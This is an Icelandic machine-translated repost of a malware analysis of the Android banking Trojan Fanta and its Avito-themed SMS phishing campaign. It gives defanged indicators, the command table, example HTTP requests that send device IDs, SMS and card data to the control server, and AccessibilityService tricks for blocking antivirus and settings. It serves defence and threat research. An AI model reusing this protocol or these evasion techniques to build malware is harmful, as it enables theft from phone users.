ProHoster > Blog > netfréttir > Leysya, Fanta: ný taktík fyrir gamlan Android Tróverji

Leysya, Fanta: ný taktík fyrir gamlan Android Tróverji

Leysya, Fanta: ný taktík fyrir gamlan Android Tróverji

Einn daginn sem þú vilt selja eitthvað á Avito og eftir að hafa birt nákvæma lýsingu á vörunni þinni (til dæmis vinnsluminniseiningu), færðu þessi skilaboð:

Leysya, Fanta: ný taktík fyrir gamlan Android TróverjiÞegar þú hefur opnað hlekkinn muntu sjá að því er virðist saklausa síðu sem lætur þig, hinn hamingjusama og farsæla seljanda, vita að kaup hafi verið gerð:

Leysya, Fanta: ný taktík fyrir gamlan Android Tróverji
Þegar þú smellir á „Halda áfram“ hnappinn verður APK skrá með tákni og traustvekjandi nafni hlaðið niður í Android tækið þitt. Þú settir upp forrit sem af einhverjum ástæðum óskaði eftir AccessibilityService réttindi, þá birtust nokkrir gluggar og hurfu fljótt og... Það er allt.

Þú ferð til að athuga stöðuna þína, en af ​​einhverjum ástæðum biður bankaforritið þitt um kortaupplýsingarnar þínar aftur. Eftir að hafa slegið inn gögnin gerist eitthvað hræðilegt: af einhverjum ástæðum sem þér er enn óljóst byrja peningar að hverfa af reikningnum þínum. Þú ert að reyna að leysa vandamálið, en síminn þinn streymir: hann ýtir á „Back“ og „Heim“ takkana, slekkur ekki á sér og leyfir þér ekki að virkja neinar öryggisráðstafanir. Fyrir vikið situr þú eftir án peninga, vörurnar þínar hafa ekki verið keyptar, þú ert ruglaður og veltir fyrir þér: hvað gerðist?

Svarið er einfalt: þú hefur orðið fórnarlamb Android Trojan Fanta, meðlimur Flexnet fjölskyldunnar. Hvernig gerðist þetta? Við skulum útskýra núna.

Höfundar: Andrey Polovinkin, yngri sérfræðingur í greiningu á spilliforritum, Ivan Pisarev, sérfræðingur í greiningu á spilliforritum.

Sumar tölfræði

Flexnet fjölskyldan af Android Tróverji varð fyrst þekkt aftur árið 2015. Á nokkuð löngu tímabili stækkaði fjölskyldan í nokkrar undirtegundir: Fanta, Limebot, Lipton o.fl. Trójuverjinn, sem og innviðirnir sem tengjast honum, standa ekki í stað: ný skilvirk dreifingarkerfi eru í þróun - í okkar tilfelli eru hágæða vefveiðasíður sem miða að ákveðnum notendaseljendum og trójuverjar fylgja tískustraumum í vírusskrif - bætir við nýrri virkni sem gerir það mögulegt að stela peningum á skilvirkari hátt frá sýktum tækjum og framhjá verndarbúnaði.

Herferðin sem lýst er í þessari grein er ætluð notendum frá Rússlandi; lítill fjöldi sýktra tækja var skráð í Úkraínu og enn færri í Kasakstan og Hvíta-Rússlandi.

Jafnvel þó Flexnet hafi verið á Android Trojan vettvangi í meira en 4 ár núna og hefur verið rannsakað ítarlega af mörgum vísindamönnum, þá er það enn í góðu formi. Frá og með janúar 2019 er hugsanleg tjón meira en 35 milljónir rúblur - og þetta er aðeins fyrir herferðir í Rússlandi. Árið 2015 voru ýmsar útgáfur af þessu Android Trójuverji seldar á neðanjarðar spjallborðum, þar sem frumkóða Tróverjans með nákvæmri lýsingu var einnig að finna. Þetta þýðir að tölur um tjón í heiminum eru enn áhrifameiri. Ekki slæm vísbending fyrir svona gamlan mann, er það ekki?

Leysya, Fanta: ný taktík fyrir gamlan Android Tróverji

Frá sölu til blekkingar

Eins og sést á áður kynntu skjáskoti af vefveiðasíðu fyrir netþjónustuna til að birta auglýsingar Avito, var hún útbúin fyrir ákveðið fórnarlamb. Svo virðist sem árásarmennirnir nota einn af þáttum Avito, sem dregur út símanúmerið og nafn seljandans, sem og vörulýsinguna. Eftir að hafa stækkað síðuna og útbúið APK-skrá er fórnarlambinu sent SMS með nafni hans og hlekk á vefveiðarsíðu sem inniheldur lýsingu á vörunni hans og upphæðinni sem fékkst við „sölu“ vörunnar. Með því að smella á hnappinn fær notandinn skaðlega APK skrá - Fanta.

Rannsókn á shcet491[.]ru léninu sýndi að það er úthlutað til DNS netþjóna Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Lénssvæðisskráin inniheldur færslur sem vísa á IP tölurnar 31.220.23[.]236, 31.220.23[.]243 og 31.220.23[.]235. Hins vegar bendir aðal tilfangaskrá lénsins (A-skrá) á netþjón með IP-tölu 178.132.1[.]240.

IP-tala 178.132.1[.]240 er staðsett í Hollandi og tilheyrir hýsingaraðilanum WorldStream. IP tölur 31.220.23[.]235, 31.220.23[.]236 og 31.220.23[.]243 eru staðsettar í Bretlandi og tilheyra sameiginlega hýsingarþjóninum HOSTINGER. Notað sem upptökutæki openprov-ru. Eftirfarandi lén leystust einnig í IP tölu 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Það skal tekið fram að tenglar á eftirfarandi sniði voru fáanlegir frá næstum öllum lénum:

http://(www.){0,1}<%domain%>/[0-9]{7}

Þetta sniðmát inniheldur einnig tengil úr SMS skilaboðum. Byggt á sögulegum gögnum kom í ljós að eitt lén samsvarar nokkrum tenglum í mynstrinu sem lýst er hér að ofan, sem gefur til kynna að eitt lén hafi verið notað til að dreifa Tróverjanum til nokkurra fórnarlamba.

Við skulum stökkva aðeins á undan: Tróverjinn sem er hlaðið niður með hlekk frá SMS notar heimilisfangið onusedseddohap[.]klúbbur. Þetta lén var skráð 2019-03-12 og frá og með 2019-04-29 höfðu APK forrit samskipti við þetta lén. Byggt á gögnum sem fengust frá VirusTotal höfðu alls 109 forrit samskipti við þennan netþjón. Lénið sjálft leysti IP töluna 217.23.14[.]27, staðsett í Hollandi og í eigu gestgjafans WorldStream. Notað sem upptökutæki nafnaskipti. Lén leyst einnig upp á þetta IP-tölu bad-racoon[.]klúbbur (frá 2018-09-25) og bad-racoon[.]live (frá 2018-10-25). Með léni bad-racoon[.]klúbbur meira en 80 APK skrár höfðu samskipti við bad-racoon[.]live - meira en 100.

Almennt séð framfarir árásin sem hér segir:

Leysya, Fanta: ný taktík fyrir gamlan Android Tróverji

Hvað er undir loki Fanta?

Eins og margir aðrir Android Tróverji, er Fanta fær um að lesa og senda SMS skilaboð, gera USSD beiðnir og birta sína eigin glugga ofan á forrit (þar á meðal banka). Hins vegar er vopnabúr af virkni þessarar fjölskyldu komið: Fanta byrjaði að nota Aðgengisþjónusta í ýmsum tilgangi: að lesa innihald tilkynninga frá öðrum forritum, koma í veg fyrir uppgötvun og stöðva keyrslu tróverja á sýktu tæki o.s.frv. Fanta virkar á öllum útgáfum af Android ekki yngri en 4.4. Í þessari grein munum við skoða eftirfarandi Fanta sýnishorn nánar:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Strax eftir sjósetningu

Strax eftir ræsingu felur Tróverji táknið sitt. Forritið getur aðeins virkað ef nafn sýkta tækisins er ekki á listanum:

  • android_x86
  • VirtualBox
  • Nexus 5X (bullhead)
  • Nexus 5 (rakvél)

Þessi athugun er framkvæmd í aðalþjónustu Tróverjans - Aðalþjónusta. Þegar það er opnað í fyrsta skipti eru stillingarfæribreytur forritsins frumstilltar á sjálfgefin gildi (sniðið til að geyma stillingargögn og merkingu þeirra verður rætt síðar) og nýtt sýkt tæki er skráð á stjórnunarþjóninn. HTTP POST beiðni með skilaboðagerðinni verður send á netþjóninn register_bot og upplýsingar um sýkta tækið (Android útgáfa, IMEI, símanúmer, nafn símafyrirtækis og landsnúmer sem símafyrirtækið er skráð í). Heimilisfangið þjónar sem stjórnþjónn hXXp://onuseseddohap[.]club/controller.php. Sem svar sendir þjónninn skilaboð sem innihalda reitina bot_id, bot_pwd, miðlara - forritið vistar þessi gildi sem færibreytur CnC netþjónsins. Parameter miðlara valfrjálst ef reiturinn barst ekki: Fanta notar skráningar heimilisfangið - hXXp://onuseseddohap[.]club/controller.php. Aðgerðin við að breyta CnC vistfanginu er hægt að nota til að leysa tvö vandamál: að dreifa álaginu jafnt á milli nokkurra netþjóna (með fjölda sýktra tækja getur álagið á óbjartsýni vefþjóns verið mikið) og einnig til að nota annan valkost. miðlara ef bilun verður á einum af CnC netþjónunum.

Ef villa kemur upp þegar beiðnin er send mun Tróverji endurtaka skráningarferlið eftir 20 sekúndur.

Þegar tækið hefur verið skráð með góðum árangri mun Fanta birta notandanum eftirfarandi skilaboð:

Leysya, Fanta: ný taktík fyrir gamlan Android Tróverji
Mikilvæg athugasemd: þjónustan hringdi Kerfisöryggi — heiti Trójuþjónustunnar og eftir að hafa smellt á hnappinn OK Gluggi opnast með aðgengisstillingum sýkta tækisins, þar sem notandinn verður að veita aðgengisréttindi fyrir skaðlega þjónustu:

Leysya, Fanta: ný taktík fyrir gamlan Android Tróverji
Um leið og notandinn kveikir á Aðgengisþjónusta, Fanta fær aðgang að innihaldi forritsglugga og aðgerðum sem gerðar eru í þeim:

Leysya, Fanta: ný taktík fyrir gamlan Android Tróverji
Strax eftir að hafa fengið aðgengisréttindi, biður Trójuverjinn um stjórnandaréttindi og réttindi til að lesa tilkynningar:

Leysya, Fanta: ný taktík fyrir gamlan Android Tróverji
Með því að nota AccessibilityService líkir forritið eftir ásláttum og gefur þar með sér öll nauðsynleg réttindi.

Fanta býr til mörg gagnagrunnstilvik (sem verður lýst síðar) sem eru nauðsynleg til að geyma stillingargögn, svo og upplýsingar sem safnað er í ferlinu um sýkta tækið. Til að senda söfnuðu upplýsingarnar býr Tróverjinn til endurtekið verkefni sem ætlað er að hlaða niður reitum úr gagnagrunninum og fá skipun frá stjórnþjóninum. Tímabilið fyrir aðgang að CnC er stillt eftir Android útgáfunni: ef um 5.1 er að ræða verður bilið 10 sekúndur, annars 60 sekúndur.

Til að fá skipunina gerir Fanta beiðni GetTask til stjórnunarþjónsins. Sem svar getur CnC sent eina af eftirfarandi skipunum:

Team Lýsing
0 Sendu SMS skilaboð
1 Hringdu í síma eða USSD skipun
2 Uppfærir færibreytu bil
3 Uppfærir færibreytu stöðva
6 Uppfærir færibreytu smsManager
9 Byrjaðu að safna SMS skilaboðum
11 Endurstilltu símann þinn í verksmiðjustillingar
12 Virkja/slökkva á skráningu við gerð valglugga

Fanta safnar einnig tilkynningum frá 70 bankaöppum, hraðgreiðslukerfum og rafveski og geymir þær í gagnagrunni.

Geymir stillingarfæribreytur

Til að geyma stillingarbreytur notar Fanta staðlaða nálgun fyrir Android pallinn - Valmöguleikar-skrár. Stillingarnar verða vistaðar í skrá sem heitir Stillingar. Lýsing á vistuðum breytum er í töflunni hér að neðan.

nafn Sjálfgefið gildi Möguleg gildi Lýsing
id 0 Integer Bota auðkenni
miðlara hXXp://onuseseddohap[.]club/ URL Stýra vistfang netþjóns
pwd - Band Lykilorð miðlara
bil 20 Integer Tímabil. Gefur til kynna hversu lengi ætti að fresta eftirfarandi verkefnum:

  • Þegar þú sendir beiðni um stöðu sent SMS skilaboð
  • Að fá nýja skipun frá stjórnunarþjóninum
stöðva allt allt/símanúmer Ef reiturinn er jafn strengur allt eða símanúmer, þá verða mótteknu SMS-skilaboðin hleruð af forritinu og ekki sýnd notandanum
smsManager 0 0/1 Virkja/slökkva á forritinu sem sjálfgefinn SMS viðtakanda
readDialog rangar Rétt Rangt Virkja/slökkva á atburðaskráningu Aðgengisviðburður

Fanta notar líka skrána smsManager:

nafn Sjálfgefið gildi Möguleg gildi Lýsing
stk - Band Nafn SMS skilaboðastjóra notað

Samskipti við gagnagrunna

Meðan á rekstri þess stendur notar Tróverjinn tvo gagnagrunna. Gagnagrunnur nefndur a notað til að geyma ýmsar upplýsingar sem safnað er úr símanum. Annar gagnagrunnurinn er nefndur fanta.db og er notað til að vista stillingar sem bera ábyrgð á að búa til vefveiðarglugga sem ætlað er að safna upplýsingum um bankakort.

Trojan notar gagnagrunn а til að geyma safnaðar upplýsingar og skrá aðgerðir þínar. Gögn eru geymd í töflu logs. Til að búa til töflu, notaðu eftirfarandi SQL fyrirspurn:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Gagnagrunnurinn inniheldur eftirfarandi upplýsingar:

1. Skráir ræsingu sýkta tækisins með skilaboðum Kveikt var á símanum!

2. Tilkynningar úr umsóknum. Skilaboðin eru búin til samkvæmt eftirfarandi sniðmáti:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Bankakortagögn úr vefveiðaeyðublöðum sem Tróverjinn bjó til. Parameter VIEW_NAME getur verið eitt af eftirfarandi:

  • AliExpress
  • Avito
  • Google Play
  • Ýmislegt <%App Name%>

Skilaboðin eru skráð á formi:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Innkomin/útgeng SMS skilaboð á sniðinu:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Upplýsingar um pakkann sem býr til svargluggann á sniðinu:

(<%Package name%>)<%Package information%>

Dæmi tafla logs:

Leysya, Fanta: ný taktík fyrir gamlan Android Tróverji
Einn af virkni Fanta er söfnun upplýsinga um bankakort. Gagnasöfnun á sér stað með því að búa til vefveiðarglugga þegar bankaforrit eru opnuð. Tróverjinn býr til phishing gluggann aðeins einu sinni. Upplýsingar um að glugginn hafi verið sýndur notanda eru geymdar í töflu Stillingar í gagnagrunninum fanta.db. Til að búa til gagnagrunn skaltu nota eftirfarandi SQL fyrirspurn:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Allir töflureitir Stillingar sjálfgefið frumstillt í 1 (búa til phishing glugga). Eftir að notandinn slær inn gögnin sín verður gildið stillt á 0. Dæmi um töflureiti Stillingar:

  • can_login — reiturinn ber ábyrgð á því að birta eyðublaðið þegar bankaumsókn er opnuð
  • fyrsti_banki - ónotað
  • can_avito — reiturinn ber ábyrgð á því að birta eyðublaðið þegar Avito forritið er opnað
  • can_ali — reiturinn ber ábyrgð á að birta eyðublaðið þegar Aliexpress forritið er opnað
  • getur_annar — reiturinn ber ábyrgð á að birta eyðublaðið þegar opnað er hvaða umsókn sem er af listanum: Yula, Pandao, Drom Auto, Veski. Afsláttar- og bónuskort, Aviasales, Booking, Trivago
  • can_card — reiturinn ber ábyrgð á að birta eyðublaðið þegar það er opnað Google Play

Samskipti við stjórnunarþjóninn

Netsamskipti við stjórnunarþjóninn eiga sér stað í gegnum HTTP samskiptareglur. Til að vinna með netið notar Fanta hið vinsæla Retrofit bókasafn. Beiðnir eru sendar á: hXXp://onuseseddohap[.]club/controller.php. Hægt er að breyta vistfangi miðlarans þegar þú skráir þig á netþjóninn. Vafrakökur gætu verið sendar sem svar frá þjóninum. Fanta gerir eftirfarandi beiðnir til netþjónsins:

  • Skráning á botni á stjórnþjóninum á sér stað einu sinni, við fyrstu ræsingu. Eftirfarandi gögn um sýkta tækið eru send á netþjóninn:
    · Cookie — kökur mótteknar frá þjóninum (sjálfgefið gildi er tómur strengur)
    · ham — strengjafasti register_bot
    · forskeyti — heiltölufasti 2
    · version_sdk — er myndað samkvæmt eftirfarandi sniðmáti: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei — IMEI sýkta tækisins
    · land — kóða landsins þar sem rekstraraðilinn er skráður, á ISO-sniði
    · númer - símanúmer
    · rekstraraðila — nafn símafyrirtækis

    Dæmi um beiðni send á netþjóninn:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Sem svar við beiðninni verður þjónninn að skila JSON hlut sem inniheldur eftirfarandi færibreytur:
    · bot_id — Auðkenni sýkta tækisins. Ef bot_id er jafnt og 0 mun Fanta framkvæma beiðnina aftur.
    bot_pwd - lykilorð fyrir netþjóninn.
    miðlara — vistfang stjórnunarþjóns. Valfrjáls færibreyta. Ef færibreytan er ekki tilgreind verður vistfangið sem er vistað í forritinu notað.

    Dæmi JSON hlutur:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Beiðni um að fá skipun frá þjóninum. Eftirfarandi gögn eru send á netþjóninn:
    · Cookie — kökur mótteknar frá þjóninum
    · tilboð — auðkenni sýkta tækisins sem var móttekið þegar beiðnin var send register_bot
    · pwd — lykilorð fyrir netþjóninn
    · deild_admin — reiturinn ákvarðar hvort stjórnandaréttindi hafi verið aflað. Ef stjórnandaréttindi hafa verið fengin er reiturinn jöfn 1, annars 0
    · Aðgengi — Rekstrarstaða aðgengisþjónustu. Ef þjónustan var hafin er gildið 1, annars 0
    · SMSManager — sýnir hvort Tróverji er virkt sem sjálfgefið forrit til að taka á móti SMS
    · skjár — sýnir í hvaða ástandi skjárinn er. Gildið verður stillt 1, ef kveikt er á skjánum, annars 0;

    Dæmi um beiðni send á netþjóninn:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Það fer eftir skipuninni, þjónninn getur skilað JSON hlut með mismunandi breytum:

    · Team Sendu SMS skilaboð: Færibreyturnar innihalda símanúmerið, texta SMS skilaboðanna og auðkenni skilaboðanna sem verið er að senda. Auðkennið er notað þegar skilaboð eru send til netþjónsins með tegund setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · Team Hringdu í síma eða USSD skipun: Símanúmerið eða skipunin kemur í svarhlutanum. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · Team Breyta bilbreytu. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · Team Breyta intercept færibreytu. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · Team Breyta SmsManager reit. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · Team Safnaðu SMS skilaboðum úr sýktu tæki.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · Team Endurstilltu símann þinn í verksmiðjustillingar: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · Team Breyta ReadDialog færibreytu. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Sendi skilaboð með tegund setSmsStatus. Þessi beiðni er gerð eftir að skipunin er framkvæmd Sendu SMS skilaboð. Beiðnin lítur svona út:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Að hlaða upp innihaldi gagnagrunns. Ein röð er send fyrir hverja beiðni. Eftirfarandi gögn eru send á netþjóninn:
    · Cookie — kökur mótteknar frá þjóninum
    · ham — strengjafasti setSaveInboxSms
    · tilboð — auðkenni sýkta tækisins sem var móttekið þegar beiðnin var send register_bot
    · texta — texti í núverandi gagnagrunnsfærslu (reitur d frá borði logs í gagnagrunninum а)
    · númer — heiti núverandi gagnagrunnsfærslu (reitur p frá borði logs í gagnagrunninum а)
    · sms_hamur — heiltölugildi (reitur m frá borði logs í gagnagrunninum а)

    Beiðnin lítur svona út:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Ef vel tekst að senda á netþjóninn verður röðinni eytt úr töflunni. Dæmi um JSON hlut sem þjónninn skilar:

    {
    "response":[],
    "status":"ok"
}

Samskipti við AccessibilityService

AccessibilityService var innleitt til að gera Android tæki auðveldara í notkun fyrir fólk með fötlun. Í flestum tilfellum þarf líkamleg samskipti til að hafa samskipti við forrit. AccessibilityService gerir þér kleift að gera þær forritunarlega. Fanta notar þjónustuna til að búa til falsa glugga í bankaforritum og koma í veg fyrir að notendur opni kerfisstillingar og sum forrit.

Með því að nota virkni AccessibilityService, fylgist Tróverji með breytingum á þáttum á skjánum á sýkta tækinu. Eins og áður hefur verið lýst innihalda Fanta stillingarnar færibreytu sem ber ábyrgð á skráningaraðgerðum með svargluggum - readDialog. Ef þessi færibreyta er stillt verður upplýsingum um nafn og lýsingu á pakkanum sem setti atburðinn af stað bætt við gagnagrunninn. Tróverjinn framkvæmir eftirfarandi aðgerðir þegar atburðir koma af stað:

  • Hermir eftir því að ýta á bak- og heimatakkana í eftirfarandi tilvikum:
    · ef notandinn vill endurræsa tækið sitt
    · ef notandi vill eyða „Avito“ forritinu eða breyta aðgangsréttindum
    · ef minnst er á „Avito“ forritið á síðunni
    · þegar Google Play Protect forritið er opnað
    · þegar þú opnar síður með AccessibilityService stillingum
    · þegar System Security svarglugginn birtist
    · þegar þú opnar síðuna með stillingunum „teikna yfir annað forrit“
    · þegar þú opnar „Forrit“ síðuna, „Endurheimta og endurstilla“, „Endurstilla gagna“, „Endurstilla stillingar“, „Hönnuðarspjaldið“, „Sérstakt. tækifæri", "Sérstök tækifæri", "Sérstök réttindi"
    · ef viðburðurinn var myndaður af ákveðnum forritum.

    Listi yfir umsóknir

    • Android
    • Master Lite
    • Hreinn meistari
    • Clean Master fyrir x86 CPU
    • Meizu umsókn leyfisstjórnun
    • MIUI öryggi
    • Clean Master - vírusvarnar- og skyndiminni og sorphreinsir
    • Foreldraeftirlit og GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Veiruhreinsir, vírusvörn, hreinsiefni (MAX öryggi)
    • Mobile AntiVirus Security PRO
    • Avast vírusvarnir og ókeypis vernd 2019
    • Farsímaöryggi MegaFon
    • AVG vernd fyrir Xperia
    • Farsímaöryggi
    • Malwarebytes vírusvarnir og vernd
    • Vírusvörn fyrir Android 2019
    • Öryggismeistari - vírusvörn, VPN, AppLock, Booster
    • AVG vírusvarnarforrit fyrir Huawei spjaldtölvu Kerfisstjóri
    • Samsung aðgengi
    • Samsung Smart Manager
    • Öryggisstjóri
    • Hraðastillir
    • Dr.Web
    • Dr.Web öryggisrými
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus & Mobile Security
    • Kaspersky Internet Security: Vírusvörn og vernd
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - vernd og stjórnun
    • AVG Antivirus ókeypis 2019 – Vörn fyrir Android
    • Antivirus Android
    • Norton Mobile Security og Antivirus
    • Vírusvörn, eldveggur, VPN, farsímaöryggi
    • Farsímaöryggi: vírusvörn, VPN, þjófnaðarvörn
    • Vírusvörn fyrir Android

  • Ef óskað er eftir leyfi þegar SMS-skilaboð eru send í stutt númer, líkir Fanta eftir því að smella á gátreitinn Mundu val og hnappur að senda.
  • Þegar þú reynir að taka stjórnandaréttindi af Trójuverinu læsir það símaskjánum.
  • Kemur í veg fyrir að nýjum stjórnendum sé bætt við.
  • Ef vírusvarnarforritið dr.vef uppgötvaði ógn, Fanta líkir eftir því að ýta á hnappinn hunsa.
  • Trójumaðurinn líkir eftir því að ýta á bak- og heimahnappinn ef atburðurinn var myndaður af forritinu Samsung tæki umönnun.
  • Fanta býr til vefveiðarglugga með eyðublöðum til að slá inn upplýsingar um bankakort ef forrit af lista yfir um 30 mismunandi netþjónustur var opnað. Meðal þeirra: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto osfrv.

    Vefveiðareyðublöð

    Fanta greinir hvaða forrit eru í gangi á sýkta tækinu. Ef vaxtaumsókn var opnuð birtir Tróverjinn phishing glugga ofan á alla aðra, sem er eyðublað til að slá inn bankakortaupplýsingar. Notandinn verður að slá inn eftirfarandi gögn:

    • Kortanúmer
    • Gildistími korts
    • CVV
    • Nafn korthafa (ekki fyrir alla banka)

    Það fer eftir forritinu sem er í gangi, mismunandi veiðigluggar birtast. Hér að neðan eru dæmi um nokkrar þeirra:

    AliExpress:

    Leysya, Fanta: ný taktík fyrir gamlan Android Tróverji
    Avito:

    Leysya, Fanta: ný taktík fyrir gamlan Android Tróverji
    Fyrir sum önnur forrit, t.d. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leysya, Fanta: ný taktík fyrir gamlan Android Tróverji

    Hvernig það var í raun og veru

    Sem betur fer reyndist sá sem fékk SMS-skilaboðin sem lýst var í upphafi greinarinnar vera netöryggissérfræðingur. Þess vegna er hin raunverulega útgáfa sem ekki er leikstjóri frábrugðin þeirri sem áður var sagt: einstaklingur fékk áhugavert SMS, eftir það gaf hann það til Group-IB Threat Hunting Intelligence teymisins. Niðurstaða árásarinnar er þessi grein. Hamingjusamur endir, ekki satt? Hins vegar endar ekki allar sögur svo farsællega og svo að þín líti ekki út eins og leikstjóra með tapi á peningum, er í flestum tilfellum nóg að fylgja eftirfarandi löngu lýst reglum:

    • ekki setja upp forrit fyrir farsíma með Android OS frá öðrum aðilum en Google Play
    • Þegar forrit er sett upp skaltu fylgjast sérstaklega með þeim réttindum sem forritið biður um
    • gaum að framlengingum niðurhalaðra skráa
    • setja upp Android OS uppfærslur reglulega
    • ekki heimsækja grunsamlegar heimildir og ekki hlaða niður skrám þaðan
    • Ekki smella á tengla sem berast í SMS skilaboðum.

Heimild: www.habr.com

Bæta við athugasemd